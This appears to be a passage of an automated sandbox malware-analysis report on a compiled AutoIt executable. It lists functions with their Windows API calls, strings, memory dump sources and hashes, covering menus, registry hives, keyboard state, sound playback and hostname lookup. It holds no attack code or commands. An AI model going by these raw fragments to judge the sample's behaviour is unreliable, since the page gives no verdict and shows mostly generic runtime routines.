Part of subcall function 00E759CD: _wcscpy.LIBCMT ref: 00E75A05

Part of subcall function 00E9387D: _iswctype.LIBCMT ref: 00E93885

Strings

Error opening the file, xrefs: 00EAE866, 00EAE8E1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00EAE84A
Unterminated string, xrefs: 00EAEC0D
EA06, xrefs: 00EAE87B
>>>AUTOIT SCRIPT<<<, xrefs: 00EAE8BF
Bad directive syntax error, xrefs: 00EAEBC6
AU3!, xrefs: 00E76CC1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 01856ff4e6f313214d43dc30cb5f52085bbc40eeb1b7343278d7c25dde57bfcb
Instruction ID: 24a56b0d90f09518db61982938696e673995b8de745dfaa3a2bfa91bdd54e8ae
Opcode Fuzzy Hash: 01856ff4e6f313214d43dc30cb5f52085bbc40eeb1b7343278d7c25dde57bfcb
Instruction Fuzzy Hash: CA02AF311083419FC724EF24C881AAFBBE5FF89354F04991DF49AA72A1DB30E949CB52

Function 00E745DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E745F9
GetMenuItemCount.USER32(00F36890), ref: 00EAD7CD
GetMenuItemCount.USER32(00F36890), ref: 00EAD87D
GetCursorPos.USER32(?), ref: 00EAD8C1
SetForegroundWindow.USER32(00000000), ref: 00EAD8CA
TrackPopupMenuEx.USER32(00F36890,00000000,?,00000000,00000000,00000000), ref: 00EAD8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EAD8E9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
Instruction ID: b0f775b47ad1a7b21c2d8e58b8b1b06c3619cdd2eecf029a150d509ea95a0046
Opcode Fuzzy Hash: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
Instruction Fuzzy Hash: A9712A70604205BFEB248F64DC45FAABF64FF4A368F105216F529BA1E0C7B1AC10DB94

Function 00EF10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC

Strings

HKU, xrefs: 00EF11CE
HKCU, xrefs: 00EF11AC
HKEY_CURRENT_USER, xrefs: 00EF119B
HKEY_CURRENT_CONFIG, xrefs: 00EF1179
HKEY_LOCAL_MACHINE, xrefs: 00EF1125
HKLM, xrefs: 00EF113A
HKCR, xrefs: 00EF1164
HKEY_CLASSES_ROOT, xrefs: 00EF114F
HKEY_USERS, xrefs: 00EF11BD
HKCC, xrefs: 00EF118A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
Instruction ID: 16ea6aa0ede1977d9d8b1b1b575009231c51d04411ae5aeb7095a92393be959d
Opcode Fuzzy Hash: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
Instruction Fuzzy Hash: E6419A3010425ECFDF10EF94E891AFA3364AF11304F416494FE917B292DB30A95ADBA0

Function 00ED5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

Part of subcall function 00E77A84: _memmove.LIBCMT ref: 00E77B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ED55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ED55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ED560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ED561C

Strings

open , xrefs: 00ED5581
play PlayMe, xrefs: 00ED5617
alias PlayMe, xrefs: 00ED55AB
status PlayMe mode, xrefs: 00ED55CD
play PlayMe wait, xrefs: 00ED5606
close PlayMe, xrefs: 00ED55E3, 00ED5610

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
Instruction ID: 24e413e796f57aa4aa9c3344ab684e2ed736a3ac97d16271acb700b1dd00ea0e
Opcode Fuzzy Hash: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
Instruction Fuzzy Hash: B81104219501697AE720F661EC4ADFFBBBCEF92B00F40142AB854B20C1EEA18D05C5A2

Function 00ED48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00ED490E
gethostname.WSOCK32(?,00000100), ref: 00ED4928
gethostbyname.WSOCK32(?), ref: 00ED4935
_wcscpy.LIBCMT ref: 00ED495D
_memmove.LIBCMT ref: 00ED4970
inet_ntoa.WSOCK32(?), ref: 00ED497B
_strcat.LIBCMT ref: 00ED4989
_wcscpy.LIBCMT ref: 00ED49A0
WSACleanup.WSOCK32 ref: 00ED49AE
_wcscpy.LIBCMT ref: 00ED49BC

Strings

0.0.0.0, xrefs: 00ED4957

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: c5f25951648b27951da0ee283f58eb014f24d49cac5795447740acd6bcd7e13f
Instruction ID: c5888af7c9095394db142b3c2c610aa8505c26c6427cb012b3d42733c7e0307f
Opcode Fuzzy Hash: c5f25951648b27951da0ee283f58eb014f24d49cac5795447740acd6bcd7e13f
Instruction Fuzzy Hash: 7011F371904116AFCF24AB619C46EEA77ECDF80710F0411B6F504B2191EF719A868651

Function 00ED5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00ED521C

Part of subcall function 00E90719: timeGetTime.WINMM(?,75C0B400,00E80FF9), ref: 00E9071D

Sleep.KERNEL32(0000000A), ref: 00ED5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00ED526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ED528E
SetActiveWindow.USER32 ref: 00ED52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ED52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00ED52DA
Sleep.KERNEL32(000000FA), ref: 00ED52E5
IsWindow.USER32 ref: 00ED52F1
EndDialog.USER32(00000000), ref: 00ED5302

Strings

BUTTON, xrefs: 00ED5280

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
Instruction ID: 0aa31bcd0c515c889be1829e400947ffb2890eb82ddec2a89ccf9d8f64c656ba
Opcode Fuzzy Hash: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
Instruction Fuzzy Hash: 9C21C9B1104708AFEB146F71EC89A363B6AEF84357F042425F401F13B5DB619D09E761

Function 00EDD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

CoInitialize.OLE32(00000000), ref: 00EDD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EDD8E8
SHGetDesktopFolder.SHELL32(?), ref: 00EDD8FC
CoCreateInstance.OLE32(00F02D7C,00000000,00000001,00F2A89C,?), ref: 00EDD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EDD9B7
CoTaskMemFree.OLE32(?,?), ref: 00EDDA0F
_memset.LIBCMT ref: 00EDDA4C
SHBrowseForFolderW.SHELL32(?), ref: 00EDDA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EDDAAB
CoTaskMemFree.OLE32(00000000), ref: 00EDDAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EDDAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00EDDAEB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 7034bc18bff81061b2da986e030c030578914a3727aa671b786221720cc68c7a
Instruction ID: dfb4d3df3c6db71cd4309e549573fc65cb780ade25403f9ee9d37542e295f5c0
Opcode Fuzzy Hash: 7034bc18bff81061b2da986e030c030578914a3727aa671b786221720cc68c7a
Instruction Fuzzy Hash: 0CB1FA75A00119AFDB14DFA4C888DAEBBF9EF88314B049469F509EB351DB31ED46CB50

Function 00ED052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00ED05A7
SetKeyboardState.USER32(?), ref: 00ED0612
GetAsyncKeyState.USER32(000000A0), ref: 00ED0632
GetKeyState.USER32(000000A0), ref: 00ED0649
GetAsyncKeyState.USER32(000000A1), ref: 00ED0678
GetKeyState.USER32(000000A1), ref: 00ED0689
GetAsyncKeyState.USER32(00000011), ref: 00ED06B5
GetKeyState.USER32(00000011), ref: 00ED06C3
GetAsyncKeyState.USER32(00000012), ref: 00ED06EC
GetKeyState.USER32(00000012), ref: 00ED06FA
GetAsyncKeyState.USER32(0000005B), ref: 00ED0723
GetKeyState.USER32(0000005B), ref: 00ED0731

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
Instruction ID: 39eb21658ef583fc0fd9c676694148165ffc8466988e39c46f21e0843f586827
Opcode Fuzzy Hash: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
Instruction Fuzzy Hash: 44512960A0478429FB34EBB094147EAAFF4DF01384F0C559BC9C27A7C2DA64DA4DCB51

Function 00ECC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00ECC746
GetWindowRect.USER32(00000000,?), ref: 00ECC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ECC7B6
GetDlgItem.USER32(?,00000002), ref: 00ECC7C1
GetWindowRect.USER32(00000000,?), ref: 00ECC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ECC827
GetDlgItem.USER32(?,000003E9), ref: 00ECC835
GetWindowRect.USER32(00000000,?), ref: 00ECC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ECC889
GetDlgItem.USER32(?,000003EA), ref: 00ECC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ECC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00ECC8C1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
Instruction ID: 3d988189d4510a04b39eccb62ac5fcfc28f1a42ce7e9bbe6a15b54e014cf5571
Opcode Fuzzy Hash: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
Instruction Fuzzy Hash: 03514E71B00205AFDB18CF69DD89EAEBBB6EF88710F14812DF519E6290DB71A944CB50

Function 00E7201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E720D3
KillTimer.USER32(-00000001,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00E7216E
DestroyAcceleratorTable.USER32(00000000), ref: 00EABEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF5A
DeleteObject.GDI32(00000000), ref: 00EABF6C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
Instruction ID: 1e7962d6ea53ebf622661574d2dd559627c79350632d9db115d9a40a120d11b3
Opcode Fuzzy Hash: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
Instruction Fuzzy Hash: E061C034201604EFCB359F15CC48B25B7F2FF49329F54E52CE246AA5A1C771A890EF60

Function 00E721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC

GetSysColor.USER32(0000000F), ref: 00E721D3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
Instruction ID: dd75b999184dc3a6e4fee37c67cb8752e4311262d20a7e9ce21371f92e824f77
Opcode Fuzzy Hash: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
Instruction Fuzzy Hash: E941B431101180AFDB215F68EC88BB937A5EF46335F249269FE69AA1F3C7318D42DB11

Function 00EDAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00EFF910), ref: 00EDAB76
GetDriveTypeW.KERNEL32(00000061,00F2A620,00000061), ref: 00EDAC40
_wcscpy.LIBCMT ref: 00EDAC6A

Strings

ramdisk, xrefs: 00EDABEA
network, xrefs: 00EDABD4
all, xrefs: 00EDAB7C
unknown, xrefs: 00EDAC01
cdrom, xrefs: 00EDAB92
removable, xrefs: 00EDABA8
fixed, xrefs: 00EDABBE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
Instruction ID: 929572990f28a11899f83c87fcd3d22fb6533c6578b2c2fabb626e6874dda639
Opcode Fuzzy Hash: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
Instruction Fuzzy Hash: 7451A1301183019FC710EF14C881AAEB7E5EF84314F58A82EF496772A2DB31DE4ACA53

Function 00E79997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00E799C2
__swprintf.LIBCMT ref: 00E79A0C
__i64tow.LIBCMT ref: 00EAFA0F

Strings

True, xrefs: 00EAF9D0
0x%p, xrefs: 00EAF9F1
%.15g, xrefs: 00E79A06
False, xrefs: 00EAF9D7

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 51edd2046aa8cfa4d0781875a845fe00b07ce6de824961e6e231d0614ba64b01
Instruction ID: 24f6ba366f84cba773d11d660b35f7d624e9f7e34d93e6d6b4474dc6cd01ad40
Opcode Fuzzy Hash: 51edd2046aa8cfa4d0781875a845fe00b07ce6de824961e6e231d0614ba64b01
Instruction Fuzzy Hash: 3141E571604605AFEF24EBB4DC41E7673E4EF89304F20986EE64DFA292EA31E941D711

Function 00EF73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF73D9
CreateMenu.USER32 ref: 00EF73F4
SetMenu.USER32(?,00000000), ref: 00EF7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7490
IsMenu.USER32(?), ref: 00EF74A6
CreatePopupMenu.USER32 ref: 00EF74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF74DD
DrawMenuBar.USER32 ref: 00EF74E5

Strings

0, xrefs: 00EF73CF
F, xrefs: 00EF74D1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
Instruction ID: 7570da1f70c66f49205a3063b333cf92ad25c08087a8b9315c67ccf737f7ac64
Opcode Fuzzy Hash: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
Instruction Fuzzy Hash: 04415875A00209EFDB20DF65D884AEABBF5FF49315F144029EA65A7360D730AD14CB50

Function 00EF772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF77CD
CreateCompatibleDC.GDI32(00000000), ref: 00EF77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF77E7
SelectObject.GDI32(00000000,00000000), ref: 00EF77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF77FA
DeleteDC.GDI32(00000000), ref: 00EF7803
GetWindowLongW.USER32(?,000000EC), ref: 00EF780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EF7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EF782D

Strings

static, xrefs: 00EF7765

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
